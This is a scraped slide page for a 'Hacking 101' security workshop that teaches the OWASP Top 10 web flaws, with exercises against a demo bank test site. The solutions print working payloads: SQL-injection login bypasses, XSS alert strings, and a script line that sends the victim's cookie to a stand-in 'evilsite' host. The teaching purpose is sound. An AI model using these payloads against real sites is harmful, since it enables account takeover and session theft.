hacking 101
play

Hacking 101: Hacking 101: Understanding the Top Web Application - PowerPoint PPT Presentation

Sep 20, 2023 •160 likes •1.53k views

San Francisco Chapter San Francisco Chapter Hacking 101: Hacking 101: Understanding the Top Web Application Understanding the Top Web Application Vulnerabilities and How to Protect Vulnerabilities and How to Protect Against the Next Level

  1. What is a Web Application? What is a Web Application? The business logic that  enables: ◦ User’s interaction with Web site Data ◦ Transacting/interfacing with back -end data systems (databases, Database CRM, ERP etc) In the form of:  Backend Application ◦ 3rd party packaged software; i.e. web server, application server, Front end Application software packages etc. ◦ Code developed in-house / web User Interface Code builder / system integrator Web Server User Input HTML/HTTP Browser Input and Output flow through each layer of the application A break in any layer breaks the whole application San Francisco Chapter San Francisco Chapter

  2. Infrastructure vs. Application Infrastructure vs. Application Security Issues Security Issues Infrastructure Vulnerabilities Application Specific Vulnerabilities Insecure development or deployment Insecure development of your own your own Cause of Defect of 3 rd rd party SW party SW applications applications Location of 3 rd party infrastructure infrastructure (web server, Application Code Application Code, often resides on Vulnerability OS, etc.) Application Server Known vulnerabilities (0-day), Probing hacks, suspicious content, Method of Exploits signature based information leakage Patch Management system App Security Scanners Detection Internal/External Audits, Automated Scanners Update patches, use trusted 3 rd party Training & Scanners – across the What to do software Development Life Cycle San Francisco Chapter San Francisco Chapter

  3. WASC WASC  Web Application Security Consortium (WASC) Purpose: ◦ To develop, adopt, and advocate standards for web application security  Official web site: www.webappsec.org  Web Security Threat Classification project http://www.webappsec.org/projects/threat/v1/WASC-TC-v1_0.pdf Purpose: ◦ Clarify and organize the threats to the security of a web site ◦ Develop and promote industry standard terminology for these issues San Francisco Chapter San Francisco Chapter

  4. WASC – Threat Classifications WASC – Threat Classifications 
 www.webappsec.org (Web Application Security Consortium) (Web Application Security Consortium) www.webappsec.org Application Threat Attack Types Example Business Impact Authentication  Brute Force Attacks that target a web site’s method of validating the identity of a user, service or  Insufficient Authentication application.  Weak Password Recovery Validation Authorization  Credential/Session Prediction Attacks that target a web site’s method of determining if a user, service or application  Insufficient Authorization has the necessary permissions to perform a  Insufficient Session Expiration requested action.  Session Fixation Client-side Attacks  Content Spoofing The abuse or exploitation of a web site’s users (breaching trust relationships between a user  Cross Site Scripting and a web site). Command Execution  Buffer Overflow Attacks designed to execute remote commands on the web site by manipulating  Format String Attack user-supplied input fields. Misdirect customers to bogus site  LDAP Injection  OS Commanding  SQL Injection Change parameters ie.total contribution>100%  SSI Injection  XPath Injection San Francisco Chapter San Francisco Chapter

  5. WASC – Threat Classifications WASC – Threat Classifications 
 www.webappsec.org (Web Application Security Consortium) (Web Application Security Consortium) www.webappsec.org Application Threat Attack Types Example Business Impact Information Disclosure Attacks designed to acquire system specific  Directory Indexing information about a web site. This includes  Information Leakage software distribution, version numbers, patch  Path Traversal levels, and also secure file locations.  Predictable Resource Location Logical Attacks The abuse or exploitation of a web application  Abuse of Functionality logic flow (password recovery, account  Denial of Service registration, auction bidding and eCommerce  Insufficient Anti-automation purchasing are examples of application logic).  Insufficient Process Validation San Francisco Chapter San Francisco Chapter

  6. OWASP OWASP  Open Web Application Security Project Purpose: Dedicated to finding and fighting the causes of insecure software.  Official web site: www.owasp.org  The OWASP Top Ten project http://www.owasp.org/index.php /OWASP_Top_Ten_Project  Purpose: ◦ A broad consensus about what the most critical web application security flaws are ◦ Raise awareness of web application security issues  We will use the Top 10 list to cover some of the most common security issues in web applications San Francisco Chapter San Francisco Chapter

  7. The OWASP OWASP Top 10 Application Attacks The Top 10 Application Attacks Application Threat Negative Impact Example Impact OWASP Top 10 Application Attacks Cross Site scripting Identity Theft, Sensitive Information Leakage, … Hackers can impersonate legitimate users, and control their accounts. Injection Flaws Attacker can manipulate queries to the DB / Hackers can access backend database information, alter it or LDAP / Other system steal it. Malicious File Execution Execute shell commands on server, up to full Site modified to transfer all interactions to the hacker. control Insecure Direct Object Reference Attacker can access sensitive files and resources Web application returns contents of sensitive file (instead of harmless one) Cross-Site Request Forgery Attacker can invoke “blind” actions on web Blind requests to bank account transfer money to hacker applications, impersonating as a trusted user Information Leakage and Improper Attackers can gain detailed system information Malicious system reconnaissance may assist in developing further Error Handling attacks Broken Authentication & Session Session tokens not guarded or invalidated properly Hacker can “force” session token on victim; session tokens can Management be stolen after logout Insecure Cryptographic Storage Weak encryption techniques may lead to broken Confidential information (SSN, Credit Cards) can be decrypted by encryption malicious users Insecure Communications Sensitive info sent unencrypted over insecure Unencrypted credentials “sniffed” and used by hacker to channel impersonate user Failure to Restrict URL Access Hacker can access unauthorized resources Hacker can forcefully browse and access a page past the login page San Francisco Chapter San Francisco Chapter

  8. 1. Cross-Site Scripting (XSS) 1. Cross-Site Scripting (XSS)  What is it? ◦ Malicious script echoed back into HTML returned from a trusted site, and runs under trusted context  What are the implications? ◦ Session Tokens stolen (browser security circumvented) ◦ Complete page content compromised ◦ Future pages in browser compromised San Francisco Chapter San Francisco Chapter

  9. XSS Example I XSS Example I HTML code: San Francisco Chapter San Francisco Chapter

  10. XSS Example II XSS Example II HTML code: San Francisco Chapter San Francisco Chapter

  11. XSS – Details XSS – Details  Common in Search, Error Pages and returned forms. ◦ But can be found on any type of page 
  Any input may be echoed back ◦ Path, Query, Post-data, Cookie, Header, etc. 
  Browser technology used to aid attack ◦ XMLHttpRequest (AJAX), Flash, IFrame… 
  Has many variations ◦ XSS in attribute, DOM Based XSS, etc . San Francisco Chapter San Francisco Chapter

  12. Cross Site Scripting – The Exploit Cross Site Scripting – The Exploit Process Process Evil.org 5) Evil.org uses stolen session information to 1) Link to bank.com impersonate user sent to user via E-mail or HTTP 4) Script sends user’s cookie and session information without the user’s consent or knowledge bank.com User 2) User sends script embedded as data 3) Script/data returned, executed by browser San Francisco Chapter San Francisco Chapter

  13. Exploiting XSS Exploiting XSS  If I can get you to run my JavaScript, I can… ◦ Steal your cookies for the domain you’re browsing ◦ Track every action you do in that browser from now on ◦ Redirect you to a Phishing site ◦ Completely modify the content of any page you see on this domain ◦ Exploit browser vulnerabilities to take over machine ◦ …  XSS is the Top Security Risk today (most exploited) San Francisco Chapter San Francisco Chapter

  14. Sticky/Embedded XSS (XSS Worms) Sticky/Embedded XSS (XSS Worms)  Embedding malicious script in persistent location ◦ “Talkback” section ◦ Forum/Newsgroup  Boosted with Web 2.0 trend ◦ Customizable content ◦ More user content (communities)  XSS Can “Infest” more pages - Worm ◦ MySpace worm (Samy, October 2005) San Francisco Chapter San Francisco Chapter

  15. 2. Injection Flaws 2. Injection Flaws  What is it? ◦ User-supplied data is sent to an interpreter as part of a command, query or data.  What are the implications? ◦ SQL Injection – Access/modify data in DB ◦ SSI Injection – Execute commands on server and access sensitive data ◦ LDAP Injection – Bypass authentication ◦ … San Francisco Chapter San Francisco Chapter

  16. SQL Injection SQL Injection  User input inserted into SQL Command: ◦ Get product details by id: 
 Select * from products where id=‘$REQUEST[“id”]’; ◦ Hack: send param id with value ‘ or ‘1’=‘1 ◦ Resulting executed SQL: 
 Select * from products where id=‘’ or ‘1’=‘1’ ◦ All products returned San Francisco Chapter San Francisco Chapter

  17. SQL Injection Example I SQL Injection Example I San Francisco Chapter San Francisco Chapter

  18. SQL Injection Example II SQL Injection Example II San Francisco Chapter San Francisco Chapter

  19. SQL Injection Example - Exploit SQL Injection Example - Exploit San Francisco Chapter San Francisco Chapter

  20. SQL Injection Example - Outcome SQL Injection Example - Outcome San Francisco Chapter San Francisco Chapter

  21. Injection Flaws – More Info Injection Flaws – More Info  One SQL Injection compromises entire DB ◦ Doesn’t matter if it’s a remote page  Not limited to SQL Injection ◦ LDAP, XPath, SSI, MX (Mail)… ◦ HTML Injection (Cross Site Scripting) ◦ HTTP Injection (HTTP Response Splitting) San Francisco Chapter San Francisco Chapter

  22. Injection Flaws (SSI Injection Example) Injection Flaws (SSI Injection Example) 
 Creating commands from input Creating commands from input San Francisco Chapter San Francisco Chapter

  23. The return is the private SSL key of the server The return is the private SSL key of the server San Francisco Chapter San Francisco Chapter

  24. 3. Malicious File Execution 3. Malicious File Execution  What is it? ◦ Application tricked into executing commands or creating files on server 
  What are the implications? ◦ Command execution on server – complete takeover ◦ Site Defacement, including XSS option San Francisco Chapter San Francisco Chapter

  25. Malicious File Execution – Example I Malicious File Execution – Example I San Francisco Chapter San Francisco Chapter

  26. Malicious File Execution – Example cont. Malicious File Execution – Example cont. San Francisco Chapter San Francisco Chapter

  27. Malicious File Execution – Example cont. Malicious File Execution – Example cont. San Francisco Chapter San Francisco Chapter

  28. 4. Insecure Direct Object Reference 4. Insecure Direct Object Reference  What is it? ◦ Part or all of a resource (file, table, etc.) name controlled by user input.  What are the implications? ◦ Access to sensitive resources ◦ Information Leakage, aids future hacks San Francisco Chapter San Francisco Chapter

  29. Insecure Direct Object Reference - Insecure Direct Object Reference - Example Example San Francisco Chapter San Francisco Chapter

  30. Insecure Direct Object Reference – Insecure Direct Object Reference – Example Cont. Example Cont. San Francisco Chapter San Francisco Chapter

  31. Insecure Direct Object Reference – Insecure Direct Object Reference – Example Cont. Example Cont. San Francisco Chapter San Francisco Chapter

  32. 5. Cross Site Request Forgery 5. Cross Site Request Forgery (CSRF/XSRF) (CSRF/XSRF)  What is it? ◦ Tricking a victim into sending an unwitting (often blind) request to another site, using the user’s session and/or network access. 
  What are the implications? ◦ Internal network compromised ◦ User’s web-based accounts exploited San Francisco Chapter San Francisco Chapter

  33. XSRF Exploit Illustration XSRF Exploit Illustration 4) Private mails accessed, possibly containing passwords Bank.com WebMail 4) Money Withdrawn 3) Money Transfered 3) All mails Wireless 2) Script (or link) is forwarded to Router Evil.org downloaded and hacker executed in browser 3) Router opened for 1) User browses outside access page with malicious Victim content 4) Firewalls surpassed, internal computers hacked San Francisco Chapter San Francisco Chapter

  34. XSRF vs. XSS XSRF vs. XSS  XSS Exploits the trust a user gives a site ◦ Cookies and data access to specific domain  XSRF Exploits the trust a site gives a user ◦ User “logged in” to site or has access to site (Intranet)  XSRF may be delivered via XSS (or Sticky XSS)  XSS may be auto-exploited via XSRF ◦ XSRF on one site exploit XSS on other – hands free San Francisco Chapter San Francisco Chapter

  35. 6. Information Leakage and 6. Information Leakage and Improper Error Handling Improper Error Handling  What is it? ◦ Unneeded information made available via errors or other means. 
  What are the implications? ◦ Sensitive data exposed ◦ Web App internals and logic exposed (source code, SQL syntax, exception call stacks, etc.) ◦ Information aids in further hacks San Francisco Chapter San Francisco Chapter

  36. Information Leakage - Example Information Leakage - Example San Francisco Chapter San Francisco Chapter

  37. Improper Error Handling - Example Improper Error Handling - Example San Francisco Chapter San Francisco Chapter

  38. Information Leakage – Different Information Leakage – Different Username/Password Error Username/Password Error San Francisco Chapter San Francisco Chapter

  39. 7. Broken Authentication and 7. Broken Authentication and Session Management Session Management  What is it? ◦ Session tokens aren’t guarded and invalidated properly  What are the implications? ◦ Session tokens can be planted by hacker in XSS/XSRF attack, hence leaked ◦ Session tokens more easily available (valid longer, less protection) to be stolen in different ways San Francisco Chapter San Francisco Chapter

  40. Broken Authentication and Session Broken Authentication and Session Management - Examples Management - Examples  Unprotected Session Tokens ◦ Session ID kept in Persistent Cookie ◦ Not using http-only value for cookies  Sessions valid for too long ◦ Session not invalidated after logout ◦ Session timeout too long  Session fixation possible ◦ Session ID not replaced after login (hence can be fixed) San Francisco Chapter San Francisco Chapter

  41. 8. Insecure Cryptographic Storage 8. Insecure Cryptographic Storage  What is it? ◦ Weak or no cryptographic protection on sensitive resources at rest ◦ Lack of safeguards on keys 
  What are the implications? ◦ Session tokens can be predicted (due to weak, often homegrown, algorithms) ◦ Sensitive data available through DB access (internal hacker, SQL Injection, etc.) San Francisco Chapter San Francisco Chapter

  42. Insecure Cryptographic Storage: Weak Insecure Cryptographic Storage: Weak Session Token Session Token  Hacker samples session IDs and gets: 
 1,2,4,6,7,10,11,15…  Can you predict other valid sessions? 
 (Hint: Other users may enter site and get sessions during the hacker’s sampling)  Points to consider: ◦ Doesn’t need to be that simple… ◦ Keys may be predictable (e.g. timestamp) San Francisco Chapter San Francisco Chapter

  43. 9. Insecure Communication 9. Insecure Communication  What is it? ◦ Sensitive data sent over unencrypted channels  What are the implications? ◦ Data can be stolen or manipulated by Internal or External hacker San Francisco Chapter San Francisco Chapter

  44. Insecure Communication: Points to Insecure Communication: Points to Consider Consider  Not only the login page is sensitive ◦ Anything after it is too, and maybe more  Internal Hackers are a threat ◦ Encrypt internal communications as well  Use strong encryption keys ◦ See previous topic… San Francisco Chapter San Francisco Chapter

  45. 10. Failure to Restrict URL Access 10. Failure to Restrict URL Access  What is it? ◦ Resources that should only be available to authorized users can be accessed by forcefully browsing them  What are the implications? ◦ Sensitive information leaked/modified ◦ Admin privileges made available to hacker San Francisco Chapter San Francisco Chapter

  46. Failure to Restrict URL Access - Admin Failure to Restrict URL Access - Admin User login User login /admin/admin.aspx San Francisco Chapter San Francisco Chapter

  47. Simple user logs in, forcefully browses Simple user logs in, forcefully browses to admin page to admin page San Francisco Chapter San Francisco Chapter

  48. Failure to Restrict URL Access: Failure to Restrict URL Access: 
 Privilege Escalation Types Privilege Escalation Types  Access given to completely restricted resources ◦ Accessing files that shouldn’t be served (*.bak, “Copy Of”, *.inc, *.cs, ws_ftp.log, etc.)  Vertical Privilege Escalation ◦ Unknown user accessing pages past login page ◦ Simple user accessing admin pages  Horizontal Privilege Escalation ◦ User accessing other user’s pages ◦ Example: Bank account user accessing another’s San Francisco Chapter San Francisco Chapter

  49. The OWASP OWASP Top 10 Application Attacks The Top 10 Application Attacks Application Threat Negative Impact Example Impact OWASP Top 10 Application Attacks Cross Site scripting Identity Theft, Sensitive Information Leakage, … Hackers can impersonate legitimate users, and control their accounts. Injection Flaws Attacker can manipulate queries to the DB / Hackers can access backend database information, alter it or LDAP / Other system steal it. Malicious File Execution Execute shell commands on server, up to full Site modified to transfer all interactions to the hacker. control Insecure Direct Object Reference Attacker can access sensitive files and resources Web application returns contents of sensitive file (instead of harmless one) Cross-Site Request Forgery Attacker can invoke “blind” actions on web Blind requests to bank account transfer money to hacker applications, impersonating as a trusted user Information Leakage and Improper Attackers can gain detailed system information Malicious system reconnaissance may assist in developing further Error Handling attacks Broken Authentication & Session Session tokens not guarded or invalidated properly Hacker can “force” session token on victim; session tokens can Management be stolen after logout Insecure Cryptographic Storage Weak encryption techniques may lead to broken Confidential information (SSN, Credit Cards) can be decrypted by encryption malicious users Insecure Communications Sensitive info sent unencrypted over insecure Unencrypted credentials “sniffed” and used by hacker to channel impersonate user Failure to Restrict URL Access Hacker can access unauthorized resources Hacker can forcefully browse and access a page past the login page San Francisco Chapter San Francisco Chapter

  50. Module 3: Workshop Exercises Module 3: Workshop Exercises San Francisco Chapter San Francisco Chapter

  51. Objective Objective Hacking 101: Understand reconnaissance and profiling  1. Hands-on: Find vulnerabilities and exploit a) Failure to restrict URL access and information leakage b) Cross site scripting (XSS) c) SQL Injection d) Advanced SQL Injection 2. Understand the difference between a vulnerability and an exploit San Francisco Chapter San Francisco Chapter

  52. Profiling a web application Profiling a web application San Francisco Chapter San Francisco Chapter

  53. Reconnaissance and Profiling Reconnaissance and Profiling  Platform  Application ◦ Technologies ◦ Authentication ◦ Application servers ◦ Authorization ◦ Web servers ◦ Web based administration ◦ Web server authentication ◦ User contributed content ◦ Database usage ◦ Client side validation ◦ Database type ◦ Password creation ◦ Third-party components ◦ Session state ◦ Error handling ◦ Application logic San Francisco Chapter San Francisco Chapter

  54. How much did you find? How much did you find?  Platform  Application ◦ .NET, JavaScript ◦ Form based authentication ◦ IIS 5.0+ ◦ User based authorization ◦ Anonymous web server ◦ Yes = /Admin authentication ◦ No social contribution areas ◦ Database in use ◦ No password reset ◦ MS SQL? Access? ◦ Cookies (several) ◦ User management ◦ Custom error pages connections? ◦ CGI execution San Francisco Chapter San Francisco Chapter

  55. Task 1: Access the Administration Task 1: Access the Administration section section  Step 1: Forceful browse to administration section ◦ Does it exist? ◦ The URL for the banking application is: http://demo.testfire.net/bank  What might the administrative application be? ◦ Is there a default page? ◦ What might you name a login page?  What was it for the banking application?  http://demo.testfire.net/bank/login.aspx  Step 2: Ask some questions about the login page? ◦ Is there a username associated with the password? ◦ Is the password static? ◦ What might I use for a password? ◦ Where might I look for a password?  Step 3: Exploit San Francisco Chapter San Francisco Chapter

  56. !!Action Navigate to admin directory !! We learn … Administration Section Exists San Francisco Chapter San Francisco Chapter

  57. !!Action Navigate to login.aspx page !! We learn … Common naming practices San Francisco Chapter San Francisco Chapter

  58. !!Action View page source !! We learn … The PASSWORD San Francisco Chapter San Francisco Chapter

  59. Solution – Forceful browsing Solution – Forceful browsing  Navigate to http://demo.testfire.net  Try http://demo.testfire.net/administration ◦ Fails  Try http://demo.testfire.net/admin ◦ Success ◦ No default page  Try http://demo.testfire.net/admin/logon.aspx ◦ Failure  Try http://demo.testfire.net/admin/login.aspx ◦ Success San Francisco Chapter San Francisco Chapter

  60. Solution – Information Leakage Solution – Information Leakage  The administration section uses a single password  Try to guess the password ◦ Password, password, password1, Password1 ◦ Admin, admin, Admin1, admin1 ◦ Altoro, Altoro, Altoro1, altoro1  View the page source  Search for comments ◦ Success San Francisco Chapter San Francisco Chapter

  61. Task 2: Steal the user cookie Task 2: Steal the user cookie  Step 1: Determine the best attack method ◦ How do I force the client to run my commands? ◦ What scripting language are almost all browsers able to execute?  Step 2: Find the application vulnerability ◦ Where might I be able to include content within an application? ◦ What does the payload look like? ◦ How do I access the client cookie?  Step 3: Exploit ◦ Discussion Topic  How do I send this cookie from the victim to the attacker? San Francisco Chapter San Francisco Chapter

  62. !!Action Enter search text !! We learn … Content is echoed back to page San Francisco Chapter San Francisco Chapter

  63. !!Action Enter javascript command !! We learn … Output is not encoded San Francisco Chapter San Francisco Chapter

  64. !!Action Enter JS command with cookie !! We learn … The cookie is available San Francisco Chapter San Francisco Chapter

  65. Solution – Cross site scripting (XSS) Solution – Cross site scripting (XSS)  Navigate to http://demo.testfire.net  Search for any query term ◦ Output is reflected to the page  Query: <script>alert(1)</script> ◦ Output is not encoded  Query: <script>alert(document.cookie)</script> ◦ Cookie is available and can be stolen  How would I exploit this? ◦ Social engineering - send URL of search query to victim ◦ <script>document.write('<img src=http://evilsite/'+document.cookie);</script> San Francisco Chapter San Francisco Chapter

  66. Task 3: Login without credentials Task 3: Login without credentials  Step 1: Find the login page ◦ Can you create an account? ◦ Can you determine a valid username?  Step 2: Can you cause an error? ◦ What information do you learn when you cause an error? ◦ What database is this using? ◦ What are techniques that you might use? ◦ What characters terminate a SQL statement?  Step 3: Exploit San Francisco Chapter San Francisco Chapter

  67. !!Action Username, no password !! We learn … Uses client-side JS validation San Francisco Chapter San Francisco Chapter

  68. !!Action Enter your name into the username and a single tick into the password San Francisco Chapter San Francisco Chapter

  69. !! We can guess that … SQLQuery = “SELECT Username FROM Users WHERE Username = ‘” & strUsername & “’ AND Password = ‘” & strPassword & “’” San Francisco Chapter San Francisco Chapter

  70. !!Action Enter your name, a tick, double hyphen and whatever password you want !! We learn … Double hyphen is used for a comment, the result is that every thing after the double hyphen is now treated as a comment San Francisco Chapter San Francisco Chapter

  71. !!Action Enter admin'-- and any password you want !! We learn … Valid SQL statement = login SELECT Username FROM Users WHERE Username = ‘jsmith’ AND Password = ‘demo1234’ SELECT Username FROM Users WHERE Username = ‘admin’ OR 1=1 --’ AND Password = ‘1’ San Francisco Chapter San Francisco Chapter

  72. Solution – Profile the login page Solution – Profile the login page  Navigate to http://demo.testfire.net/bank/login.aspx  Enter sample username without password ◦ Usage of client-side JavaScript  Enter sample username with password ◦ No credential enumeration  Enter sample username with single tick (') as password ◦ SQL injection vulnerability ◦ Verbose error messages ◦ Column names of username and password San Francisco Chapter San Francisco Chapter

  73. Solution – SQL Injection Solution – SQL Injection  Enter sample username with password of '-- ◦ Double hyphen terminates a SQL statement  Enter probable username (admin) with special characters appended '-- ◦ Successful exploitation of SQL injection San Francisco Chapter San Francisco Chapter

  74. Task 4: Steal all the usernames and Task 4: Steal all the usernames and passwords passwords  Step 1: Find a page that lists information ◦ What page lists information? ◦ Does the page accept user input in any way? ◦ Think about how this information is pulled from the database?  Step 2: Find the vulnerability ◦ How do I manipulate the input to find a vulnerability? ◦ What steps should I try to “break the system”  Step 3: Exploit ◦ What steps are required to make this happen? San Francisco Chapter San Francisco Chapter

  75. !!Action Start in current session !! We learn … The admin has no bank accounts San Francisco Chapter San Francisco Chapter

Recommend

ETHICAL HACKING Daniel Cloherty CAN HACKING BE ETHICAL? What makes hacking ethical?

ETHICAL HACKING Daniel Cloherty CAN HACKING BE ETHICAL? What makes hacking ethical?

ETHICAL HACKING Daniel Cloherty CAN HACKING BE ETHICAL? What makes hacking ethical? Legality VS Ethics State Sanctioned hacking BLACK HAT - Stereotypical Hacker -Stealing data for personal gain -Obviously not ethical -Using

1.17k views • 10 slides
Hacking Reinforcement Learning Guillem Duran Ballester Guillemdb @Miau_DB A tale about hacking

Hacking Reinforcement Learning Guillem Duran Ballester Guillemdb @Miau_DB A tale about hacking

Hacking Reinforcement Learning Guillem Duran Ballester Guillemdb @Miau_DB A tale about hacking AI-Corp Hacking RL 1. Information gathering 2. Scanning 3. Exploitation &amp; privilege escalation 4. Maintaining access &amp; covering tracks

960 views • 62 slides
Hacking SecondLife Michael Thumann Hacking SecondLife by Michael Thumann 2/24/08 1

Hacking SecondLife Michael Thumann Hacking SecondLife by Michael Thumann 2/24/08 1

Hacking SecondLife Michael Thumann Hacking SecondLife by Michael Thumann 2/24/08 1 Disclaimer Everything you are about to see, hear, read and experience is for educational purposes only. No warranties or guarantees implied or

692 views • 47 slides
Drone Hacking Basics Intro to UAS Architectures, Attack Vectors and RF Hacking Matt Koskela June

Drone Hacking Basics Intro to UAS Architectures, Attack Vectors and RF Hacking Matt Koskela June

Drone Hacking Basics Intro to UAS Architectures, Attack Vectors and RF Hacking Matt Koskela June 15, 2017 Outline Drone Architectures RF Basics Information Gathering RF Hacking Tools Exploits &amp; Demos Q&amp;A Why? Wrights Law

487 views • 27 slides
Hacking, Hacktivism, and Counterhacking April 22, 2015 Outline Vocabulary Hacking motivated by

Hacking, Hacktivism, and Counterhacking April 22, 2015 Outline Vocabulary Hacking motivated by

Hacking, Hacktivism, and Counterhacking April 22, 2015 Outline Vocabulary Hacking motivated by benign purposes Hacktivism Counterhacking Case Studies Site defacement Network exploration / Port scanning / SQL injection / . . .

522 views • 18 slides
Hacking Copenhagen ITS World Congress, Copenhagen 2018 Hacking Copenhagen Digitalising (life in)

Hacking Copenhagen ITS World Congress, Copenhagen 2018 Hacking Copenhagen Digitalising (life in)

ECF gratefully acknowledges financial support from the European Commission. Hacking Copenhagen ITS World Congress, Copenhagen 2018 Hacking Copenhagen Digitalising (life in) the city of Copenhagen using bicycles. Bicycle-as-a-Sensor 1.

278 views • 11 slides
Hands-On Ethical Hacking and Network Defense Second Edition Chapter 10 Hacking Web Servers

Hands-On Ethical Hacking and Network Defense Second Edition Chapter 10 Hacking Web Servers

Hands-On Ethical Hacking and Network Defense Second Edition Chapter 10 Hacking Web Servers Objectives After reading this chapter and completing the exercises, you will be able to: Describe Web applications Explain Web application

530 views • 9 slides
Pulp Google Hacking The Next Generation Search Engine Hacking Arsenal 3 August 2011 Black Hat

Pulp Google Hacking The Next Generation Search Engine Hacking Arsenal 3 August 2011 Black Hat

Pulp Google Hacking The Next Generation Search Engine Hacking Arsenal 3 August 2011 Black Hat 2011 Las Vegas, NV Presen sented ed b by: Francis Brown Rob Ragan Stach &amp; Liu, LLC www.stachliu.com Agenda O V E R V I E W

1.07k views • 72 slides
ZIGDIGGITY ZIGBEE HACKING TOOLKIT AUGUST 7-11, 2019 http://zigdiggity.c om NEW ZIGBEE HACKING

ZIGDIGGITY ZIGBEE HACKING TOOLKIT AUGUST 7-11, 2019 http://zigdiggity.c om NEW ZIGBEE HACKING

ZIGDIGGITY ZIGBEE HACKING TOOLKIT AUGUST 7-11, 2019 http://zigdiggity.c om NEW ZIGBEE HACKING TOOLKIT FREE, OPEN-SOURCE WHAT IS ZIGDIGGITY??? + = RaspBee radio + Raspberry Pi ZigDiggity - GitHub Code http://zigdiggity.com BISHOPFOX

617 views • 23 slides
Hacking C# CONTACT@ADAMFURMANEK.PL HTTP://BLOG.ADAMFURMANEK.PL FURMANEKADAM 1 19.08.2020

Hacking C# CONTACT@ADAMFURMANEK.PL HTTP://BLOG.ADAMFURMANEK.PL FURMANEKADAM 1 19.08.2020

Hacking C# CONTACT@ADAMFURMANEK.PL HTTP://BLOG.ADAMFURMANEK.PL FURMANEKADAM 1 19.08.2020 HACKING C# - ADAM FURMANEK About me Experienced with backend, frontend, mobile, desktop, ML, databases. Blogger, public speaker. Author of .NET

481 views • 37 slides
Ethical Hacking Finse 2019 Cyber Security Winter school Universitetet i Oslo Laszlo Erddi

Ethical Hacking Finse 2019 Cyber Security Winter school Universitetet i Oslo Laszlo Erddi

Ethical Hacking Finse 2019 Cyber Security Winter school Universitetet i Oslo Laszlo Erddi From Myself Associate Professor at UiO Teaching Ethical Hacking since 2012 Lecturer of the IN5290 Ethical Hacking at UiO Leader

878 views • 66 slides
Innovation through the www.linkedin.com/pulse/climate-change-healthcare-lucien- hacking

Innovation through the www.linkedin.com/pulse/climate-change-healthcare-lucien- hacking

CLIMATE CHANGE IN HELTHCARE : Driving Innovation through the www.linkedin.com/pulse/climate-change-healthcare-lucien- hacking engelen GIB DE MEDEIROS, PH.D. Digital Hospital Transformation Forum at HIC 2017 Brisbane, Australia HACKING

644 views • 27 slides
Hacking Telco equipment The HLR/HSS Laurent Ghigonis Security researcher at P1 Security Hacking

Hacking Telco equipment The HLR/HSS Laurent Ghigonis Security researcher at P1 Security Hacking

Hacking Telco equipment The HLR/HSS Laurent Ghigonis Security researcher at P1 Security Hacking Telco equipment: The HLR/HSS Laurent Ghigonis P1 Security 2014, Hackito Ergo Sum - Security Conference What are we talking about ? A mobile

724 views • 59 slides
Hacking in Popular Culture Week 2 Frank Chen | Spring 2017 Agenda Administrative Review

Hacking in Popular Culture Week 2 Frank Chen | Spring 2017 Agenda Administrative Review

Mr. Robot, an Emmy Award-winning TV drama starring a vigilante hacker CS 88S Hacking in Popular Culture Week 2 Frank Chen | Spring 2017 Agenda Administrative Review last weeks material Hack Hollywood Hacking: The Good, The

718 views • 45 slides
Hacking Russia: Inside an Hacking Russia: Inside an unprecedented prosecution of organized

Hacking Russia: Inside an Hacking Russia: Inside an unprecedented prosecution of organized

Hacking Russia: Inside an Hacking Russia: Inside an unprecedented prosecution of organized cybercrime Joseph Menn Agenda Agenda Why Russia matters (and differs from China) Why Russia matters (and differs from China) How three hackers got

557 views • 12 slides
Google Hacking against Privacy Emin Islam Tatl tatli@th.informatik.uni-mannheim.de

Google Hacking against Privacy Emin Islam Tatl tatli@th.informatik.uni-mannheim.de

Outline Google Hacking Privacy Searches Countermeasures Future Work Conclusion Google Hacking against Privacy Emin Islam Tatl tatli@th.informatik.uni-mannheim.de Department of Computer Science, University of Mannheim (on leave to the

389 views • 21 slides
Ethical Hacking Philip Robbins August 31, 2013 Information Security &amp; Assurance Program

Ethical Hacking Philip Robbins August 31, 2013 Information Security &amp; Assurance Program

ISA 330 Introduction to Proactive System Security Week #1 Ethical Hacking Philip Robbins August 31, 2013 Information Security &amp; Assurance Program University of Hawai'i West Oahu 1 Ethical Hacking Topics Introductions Syllabus

1.17k views • 88 slides
Novel Hardware-based Attacks Jason Zheng Aditya Joshi Introduction Direct hardware hacking is

Novel Hardware-based Attacks Jason Zheng Aditya Joshi Introduction Direct hardware hacking is

Novel Hardware-based Attacks Jason Zheng Aditya Joshi Introduction Direct hardware hacking is as old as the trade of hacking Common Characteristics: Physical access (at least within transmission range of EM/Accoustic signals). Seemingly

252 views • 22 slides
Hacking Magento: Creating an HTML5 Canvas Customizer on Magento Bundles Phillip Jackson

Hacking Magento: Creating an HTML5 Canvas Customizer on Magento Bundles Phillip Jackson

Hacking Magento: Creating an HTML5 Canvas Customizer on Magento Bundles Phillip Jackson @philwinkle Lead Magento Architect Something Digital NEW Hacking Magento Hacker: 1. who makes innovative customizations or combinations of

850 views • 62 slides
Horror on Horr Horr Horror on or on the b or on the b the bus the bus Hacking COMBUS in a

Horror on Horr Horr Horror on or on the b or on the b the bus the bus Hacking COMBUS in a

Horror on Horr Horr Horror on or on the b or on the b the bus the bus Hacking COMBUS in a Hacking combus in a Paradox security system Paradox security system Hackfest Decade Quebec, Canada Author Lead researcher at Possible

517 views • 36 slides
ANALYZING AN OFF-THE-SHELF SURVEILLANCE SOFTWARE HACKING TEAM CASE STUDY Friday 2 nd June, 2017

ANALYZING AN OFF-THE-SHELF SURVEILLANCE SOFTWARE HACKING TEAM CASE STUDY Friday 2 nd June, 2017

ANALYZING AN OFF-THE-SHELF SURVEILLANCE SOFTWARE HACKING TEAM CASE STUDY Friday 2 nd June, 2017 Stanislav paek Pavel eleda, Martin Draar, Martin Vizvry Introduction Hacking Team Story Began as a security services provider in 2003

324 views • 17 slides
Hacking PostgreSQL Stephen Frost Crunchy Data stephen@crunchydata.com PGConf.EU 2018 October

Hacking PostgreSQL Stephen Frost Crunchy Data stephen@crunchydata.com PGConf.EU 2018 October

Hacking PostgreSQL Stephen Frost Crunchy Data stephen@crunchydata.com PGConf.EU 2018 October 24, 2018 PostgreSQL Source Code Hacking PostgreSQL Final Code PostgreSQL Subsystems Hacking the PostgreSQL Way Stephen Frost Chief Technology

1.12k views • 36 slides
Hacking PostgreSQL Stephen Frost Crunchy Data stephen@crunchydata.com FOSDEM 2019 February 3,

Hacking PostgreSQL Stephen Frost Crunchy Data stephen@crunchydata.com FOSDEM 2019 February 3,

